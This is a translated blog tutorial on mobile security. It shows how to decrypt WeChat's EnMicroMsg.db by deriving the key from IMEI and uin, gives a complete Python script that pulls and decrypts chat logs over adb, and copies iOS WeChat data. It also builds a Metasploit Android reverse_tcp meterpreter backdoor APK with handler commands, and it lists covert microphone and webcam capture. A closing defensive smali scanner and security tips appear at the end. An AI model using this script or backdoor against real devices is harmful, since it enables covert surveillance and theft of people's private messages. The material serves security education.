In this article we look at how to obtain WeChat chat records from Android and Apple devices, and then demonstrate how a backdoor can be used to control an Android device through Metasploit. The article is fairly basic and hands-on; if you have a device, you can follow along while reading. I hope it sparks your interest in mobile security.
"How do you obtain WeChat chat records from Android and iPhone handsets?"
Android device: already rooted, with SSHDroid installed (connect to the phone over SSH or FTP)
Apple device: jailbroken, with the OpenSSH package installed
Many Android users have run into the same awkward problem: after a while the phone imperceptibly slows down, until eventually everything feels sluggish. To deal with this I did what most people do and rooted the device.
Once an Android device is rooted you have the highest level of control over its system files. For example, if WeChat is installed on the device, after rooting you can read and modify the files in WeChat's app directory through adb shell.
Android applications normally keep their database files under /data/data/packagename/database; WeChat's files live at /data/data/com.tencent.mm/MicroMsg
First, download the files to the local machine over FTP:
Inside the folder whose name is a 34-character string (it looks like random garbage) you will find the account's encrypted database file: EnMicroMsg.db
Opening it with a database viewer gives an error: the file is encrypted or is not a database.
Here we can open it with SQLite Database Browser on Windows:
It prompts for a password:
```xml
<int name="default_uin" value="146***21" />
```
The uin value found by either of the two methods above is the same.
Dial *#06# on the Android dialer to get the phone's IMEI: 354********85
The SIM (IMEI) value and the uin value concatenated give 146***21354********85
MD5: http://www.spriteking.com/cmd5/ (use the "encrypt" form on the right)
This yields the 32-character lowercase MD5 a1edf9f5***************b5e5; take its first seven characters, a1edf9f, and enter them as the password in the SQLite browser.
Linux and Mac users can also run this in a terminal:
```sh
echo -n "146***21354********85" | md5sum | cut -c -7
```
The WeChat database file now opens successfully:
```python
import os
import sys
import re
import hashlib
import csv
import time
import locale
import getopt
import subprocess


def get_db():
    """Locate EnMicroMsg.db on the device through adb (needs adb root)."""
    os.popen('adb root').close()
    text = os.popen(
        'adb shell ls /data/data/com.tencent.mm/MicroMsg/*/EnMicroMsg.db').read()
    return text.splitlines()[-1] if text else ''


def get_default_uin():
    """Read the logged-in account's uin from WeChat's shared preferences."""
    os.popen('adb root').close()
    text = os.popen(
        'adb shell cat /data/data/com.tencent.mm/shared_prefs/system_config_prefs.xml').read()
    default_uin = re.findall('name="default_uin" value="([0-9]+)"', text)
    return default_uin[0] if default_uin else 0


def get_device_ID():
    """Read the IMEI ("Device ID") from dumpsys."""
    text = os.popen('adb shell dumpsys iphonesubinfo').read()
    device_ID = re.findall('Device ID = ([0-9]+)', text)
    return device_ID[0] if device_ID else 0


def get_md5():
    """Database key: the first 7 hex characters of md5(IMEI + uin)."""
    default_uin = get_default_uin()
    device_ID = get_device_ID()
    if default_uin and device_ID:
        return hashlib.md5((device_ID + default_uin).encode()).hexdigest()[0:7]
    return ''


def parse_msgcsv(msgcsv):
    """Yield [talker, time, sender, content, img_path] for each row of the exported message table."""
    locale.setlocale(locale.LC_ALL, '')
    if hasattr(msgcsv, 'title'):  # a str: split into lines for csv.reader
        msgcsv = [line + '\n' for line in msgcsv.splitlines()]
    reader = csv.reader(msgcsv)
    next(reader)  # skip the header row
    for row in reader:
        try:
            (msg_id, svr_id, msg_type, status, is_send, show_timer,
             create_time, talker, content, img_path, _reserved, _lvbuffer) = row[:12]
        except ValueError:
            continue
        sender = 'me' if is_send == '1' else talker
        stamp = time.localtime(int(create_time) / 1000)  # createTime is in milliseconds
        time_str = time.strftime("%Y-%m-%d %a %H:%M:%S", stamp)
        yield [talker, time_str, sender, content, img_path]


def get_names(chat):
    """Distinct conversation partners (the talker column)."""
    names = {}
    for talker, time_str, sender, content, img_path in chat:
        names[talker] = 1
    return list(names.keys())


def chat_to_text(chat, name=''):
    """Render messages as text; with a name, only that one conversation."""
    text = []
    name = name.lower()
    for talker, time_str, sender, content, img_path in chat:
        content = content.replace('\n', '\n    ')
        img_path = ('\t' + img_path) if img_path else ''
        if not name:
            text.append('%s: %s %s: %s %s' % (talker, time_str, sender, content, img_path))
        elif talker.lower() == name:
            text.append('%s %s: %s %s' % (time_str, sender, content, img_path))
    return '\n'.join(text) + '\n'


def run_sqlcipher(dbn, script):
    """Pipe a script into the sqlcipher shell and return its output."""
    proc = subprocess.Popen(['sqlcipher', dbn], stdin=subprocess.PIPE,
                            stdout=subprocess.PIPE, universal_newlines=True)
    out, _ = proc.communicate(script)
    return out


def list_tables(dbn, key=''):
    """List the tables of an (optionally encrypted) database."""
    script = ''
    if key:
        script += 'PRAGMA key=%s;\n' % repr(key)
        script += 'pragma cipher_use_hmac=off;\n'
    script += '.tables\n'
    return run_sqlcipher(dbn, script).split()


def decrypt(dbn, key='', table='message'):
    """Dump one table of the encrypted database as CSV with a header row."""
    table = table or 'message'
    script = '.header on\n.mode csv\n'
    if key:
        script += 'PRAGMA key=%s;\n' % repr(key)
        script += 'pragma cipher_use_hmac=off;\n'
    script += 'select * from %s;\n' % repr(table)
    return run_sqlcipher(dbn, script)


def wechat2txt(names=()):
    """Pull the database, decrypt it, and write one text file per conversation."""
    in_file = 'EnMicroMsg.db'
    out_file = 'message.csv'
    db = get_db()
    md5 = get_md5()
    os.popen('adb wait-for-device').close()
    os.popen('adb pull %s %s' % (db, in_file)).close()
    msgcsv = decrypt(in_file, md5)
    if msgcsv.find('\n') < 0:
        return 1
    with open(out_file, 'w') as fh:
        fh.write(msgcsv)
    msgs = list(parse_msgcsv(msgcsv))
    if not msgs:
        return 1
    if not names:
        names = get_names(msgs)
    for name in names:
        filename = 'message.%s.txt' % name
        text = chat_to_text(msgs, name)
        if len(text) > 4:
            with open(filename, 'w') as fh:
                fh.write(text)
    return 0


help_msg = '''Usage: wechat2txt.py [OPTIONS] [NAME]...
OPTIONS:
    -h    display this help and exit'''


def main():
    try:
        opts, args = getopt.getopt(sys.argv[1:], 'h')
    except getopt.error:
        print(help_msg)
        return 1
    for opt, arg in opts:
        if opt == '-h':
            print(help_msg)
            return 1
    return wechat2txt(args)


if __name__ == "__main__":
    sys.exit(main())
```
Once an Apple device is jailbroken, all kinds of small packages can be installed through Cydia. I normally install OpenSSH so that I can connect to the device from a terminal and transfer files with sftp:
On iOS the application folders are named with hash values, so exporting WeChat or QQ chat records is a bit more cumbersome than on Android.
In practice we can sidestep these pitfalls with a little Linux command-line work (find, grep, xargs).
```sh
find /var/mobile/Containers/Data -name "MM.sqlite"
mkdir /cache
find /var/mobile/Containers/Data -name "MM.sqlite" | xargs -I {} dirname {} | xargs -I {} cp -r {}/../../ /cache
```
For more on extracting private data from a jailbroken iOS device, see the article "An unexpected find while fixing a goddess's phone: private data hidden in the iOS file system".
Kali Linux (attacker): 192.168.31.213
Android (target): 192.168.31.118
```sh
cd Desktop
msfpayload android/meterpreter/reverse_tcp LHOST=192.168.31.213 LPORT=443 R > 0xroot.apk
```
```
msfconsole
use exploit/multi/handler
set payload android/meterpreter/reverse_tcp
set LHOST 192.168.31.213
set LPORT 443
run
```
What can the backdoor actually do? Let's look at the usage:
```
meterpreter > help

Core Commands
=============

    Command                   Description
    -------                   -----------
    ?                         Help menu
    background                Backgrounds the current session
    bgkill                    Kills a background meterpreter script
    bglist                    Lists running background scripts
    bgrun                     Executes a meterpreter script as a background thread
    channel                   Displays information about active channels
    close                     Closes a channel
    disable_unicode_encoding  Disables encoding of unicode strings
    enable_unicode_encoding   Enables encoding of unicode strings
    exit                      Terminate the meterpreter session
    help                      Help menu
    info                      Displays information about a Post module
    interact                  Interacts with a channel
    irb                       Drop into irb scripting mode
    load                      Load one or more meterpreter extensions
    quit                      Terminate the meterpreter session
    read                      Reads data from a channel
    resource                  Run the commands stored in a file
    run                       Executes a meterpreter script or Post module
    use                       Deprecated alias for 'load'
    write                     Writes data to a channel

Stdapi: File system Commands
============================

    Command       Description
    -------       -----------
    cat           Read the contents of a file to the screen
    cd            Change directory
    download      Download a file or directory
    edit          Edit a file
    getlwd        Print local working directory
    getwd         Print working directory
    lcd           Change local working directory
    lpwd          Print local working directory
    ls            List files
    mkdir         Make directory
    pwd           Print working directory
    rm            Delete the specified file
    rmdir         Remove directory
    search        Search for files
    upload        Upload a file or directory

Stdapi: Networking Commands
===========================

    Command       Description
    -------       -----------
    ifconfig      Display interfaces
    ipconfig      Display interfaces
    portfwd       Forward a local port to a remote service
    route         View and modify the routing table

Stdapi: System Commands
=======================

    Command       Description
    -------       -----------
    execute       Execute a command
    getuid        Get the user that the server is running as
    ps            List running processes
    shell         Drop into a system command shell
    sysinfo       Gets information about the remote system, such as OS

Stdapi: Webcam Commands
=======================

    Command       Description
    -------       -----------
    record_mic    Record audio from the default microphone for X seconds
    webcam_list   List webcams
    webcam_snap   Take a snapshot from the specified webcam
```
record_mic: eavesdrop and record audio through the phone's microphone;
webcam_list: list all of the Android device's cameras;
webcam_snap: take a covert photo with a camera... and so on.
Drop the apk into an apk analysis tool (apkStudio, Bytecodeviewer) to unpack it, and let's look at the backdoor app's source:
(apkStudio)
In smali/com/metasploit/stage/MainActivity.smali we can find the backdoor's server IP and port configuration:
(apkStudio)
(Bytecodeviewer)
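As an added defensive example (not code from the original article, and not part of Metasploit or any apk tool), the heuristic below scans decompiled smali for string constants that embed an IPv4 address and port, the kind of hardcoded handler configuration the article locates by hand in MainActivity.smali, and labels each hit as RFC 1918 private or public. The sample smali text is constructed and its layout is an assumption.

```python
import glob
import os
import re
from ipaddress import ip_address

# Constructed sample modelled on the shape of a decompiled Android stager's
# MainActivity.smali (an assumption, not copied from the page or from Metasploit).
SAMPLE_SMALI = """\
.class public Lcom/metasploit/stage/MainActivity;
.method public static start(Landroid/content/Context;)V
    .locals 2
    const-string v0, "tcp://192.168.31.213:443"
    const-string v1, "https://updates.example.invalid/check"
    invoke-static {v0}, Lcom/metasploit/stage/Payload;->start(Ljava/lang/String;)V
    return-void
.end method
"""

# A smali string constant: const-string[/jumbo] vN, "..."; then an IPv4:port inside it.
CONST_STRING = re.compile(r'const-string(?:/jumbo)?\s+[vp]\d+,\s*"((?:[^"\\]|\\.)*)"')
IPV4_PORT = re.compile(r'(?<![\d.])((?:\d{1,3}\.){3}\d{1,3}):(\d{1,5})(?!\d)')


def find_hardcoded_endpoints(smali_text):
    """Flag const-string literals embedding a valid IPv4:port pair, with the line
    number and whether the address is RFC 1918 private (a lab handler) or public."""
    hits = []
    for lineno, line in enumerate(smali_text.splitlines(), 1):
        m = CONST_STRING.search(line)
        if not m:
            continue
        for host, port in IPV4_PORT.findall(m.group(1)):
            try:
                addr = ip_address(host)      # rejects e.g. 999.1.1.1
            except ValueError:
                continue
            if not 0 < int(port) <= 65535:
                continue
            hits.append({'line': lineno, 'ip': host, 'port': int(port),
                         'scope': 'private' if addr.is_private else 'public'})
    return hits


def scan_smali_tree(root):
    """Apply the heuristic to every .smali file under a decompiled APK directory."""
    report = {}
    for path in glob.glob(os.path.join(root, '**', '*.smali'), recursive=True):
        with open(path, encoding='utf-8', errors='replace') as fh:
            hits = find_hardcoded_endpoints(fh.read())
        if hits:
            report[path] = hits
    return report
```

A hit on a public address in a stage or update class is worth a closer look; a hit on a private address usually means a lab build like the one in this article.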
Android: only install apps from trusted sources to avoid picking up malware, and switch off USB debugging before plugging into a public charging station.
Apple: after jailbreaking, change the root password straight away; do not keep the default password or use a weak one.
SQLite Database Browser: http://pan.baidu.com/s/1nuWlDgd
SSHDroid: http://pan.baidu.com/s/1b6PBK6
How To Decrypt WeChat EnMicroMsg.db Database?
Android WeChat data export
WeChat chat record analysis
A look at WeChat security
https://gist.github.com/scturtle/7248017
An unexpected find while fixing a goddess's phone: private data hidden in the iOS file system
Hacking Android Smartphone Tutorial using Metasploit
[via @雪碧0xroot, 漏洞盒子 Security Team]